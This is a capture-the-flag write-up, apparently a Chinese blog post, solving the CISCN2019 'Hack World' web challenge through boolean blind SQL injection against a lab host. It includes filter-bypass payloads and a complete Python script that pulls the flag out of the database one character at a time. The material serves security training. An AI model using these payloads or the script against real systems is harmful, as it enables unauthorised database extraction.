[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解
一、分析判断
进入靶机,主页面如图:
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第1张](https://img-blog.csdnimg.cn/direct/d0512bd1883e4ac0b641203c5efd46be.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第1张")
主页面提供给我们一条关键信息: flag值在 表flag 中的 flag列 中。
接着我们尝试输入不同的id,情况分别如图:
当id=1时:
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第2张](https://img-blog.csdnimg.cn/direct/3e1a797f07024f16bbd8ee758094ff09.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第2张")
当id=2时:
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第3张](https://img-blog.csdnimg.cn/direct/ba0c23a7eac94541ae17719798959f40.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第3张")
当id=3时:
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第4张](https://img-blog.csdnimg.cn/direct/397b6676e57d45e7bcfb189c7b810e75.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第4张")
我们发现,页面提示该用户不存在,往后输入4、5....依旧如此,id=0时也一样。
当尝试 id= abc等字母时:
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第5张](https://img-blog.csdnimg.cn/direct/60144ee2f2f04209803663234aeaa8e5.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第5张")
提示类型错误,我们猜测注入类型为数字型注入。
带着猜测,我们尝试 id=1':
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第6张](https://img-blog.csdnimg.cn/direct/645634641ea74de5bcd495132401f357.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第6张")
猜测成立,注入类型为数字型注入。
然后我们尝试从表flag,列flag中查询flag的值:
1 union select flag from flag
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第7张](https://img-blog.csdnimg.cn/direct/2ab254e284a641c29406335c2636160f.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第7张")
意外出现了,页面提示我们后端代码中存在SQL注入检测,说明注入语句中有关键字被过滤了。
我们需要查询哪些关键字被过滤了。
当我们尝试 id=select时:
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第8张](https://img-blog.csdnimg.cn/direct/9107060df4e04b0da30cd07967a65a83.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第8张")
显示类型错误,显然后端将 select 当成用户名了,那我们加上1试一试。
当 id=1 select 时:
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第9张](https://img-blog.csdnimg.cn/direct/1d97eb3991b94b5c88cf5bf5bdcb75f0.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第9张")
我们发现 select 果真被过滤了,发现检查方法之后,利用Burpsuite抓包和Fuzz字典对id进行爆破,检测哪些关键字被过滤掉了。
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第10张](https://img-blog.csdnimg.cn/direct/21f22cc69a3342c0bc0cfe475fbafc7c.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第10张")
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第11张](https://img-blog.csdnimg.cn/direct/d7329e57f29548a8a709cee7660ad8a8.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第11张")
通过查看 resoponse 得知,Length=535的关键字全部都被过滤掉了,其中 union、select、extracvalue、updatexml、sleep等常见注入关键字全部都被过滤,目前只剩下一条路可走---布尔盲注。
从上文得知,id=1时,页面会回显一段文字,那么我们使用布尔盲注,使布尔值等于1,那么等效于我们在 id框中输入1。
如:
(ascii(substr((select(flag)from(flag)),1,1))>32) 若成立,则会返回1,id=1时会回显出一段字符,根据是否回显,我们可以一个一个地将flag中的字符拆解出来。
这就需要我们使用到 python 去编写盲注脚本:
import time
import requests
url = "http://3d63bec3-9674-4015-8b95-665ab2c68324.node5.buuoj.cn:81/index.php"
result = ""
for i in range(1, 50):
for j in range(32, 128):
#time.sleep(0.1)
payload = "(ascii(substr((select(flag)from(flag)),{m},1))>{n})"
response = requests.post(url=url, data={'id':payload.format(m=i,n=j)})
if response.text.find('girl') == -1:
result += chr(j)
print(j)
break
print("正在注出flag:", result)
print("flag的值为:", result)
跑出结果如下图:
![[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第12张](https://img-blog.csdnimg.cn/direct/2cbd5b93d0114c1b94ab42ced97d86bd.png "[CISCN2019 华北赛区 Day2 Web1]Hack World 1 题目分析与详解 第12张")
最终拿到 flag,成功提交通关。
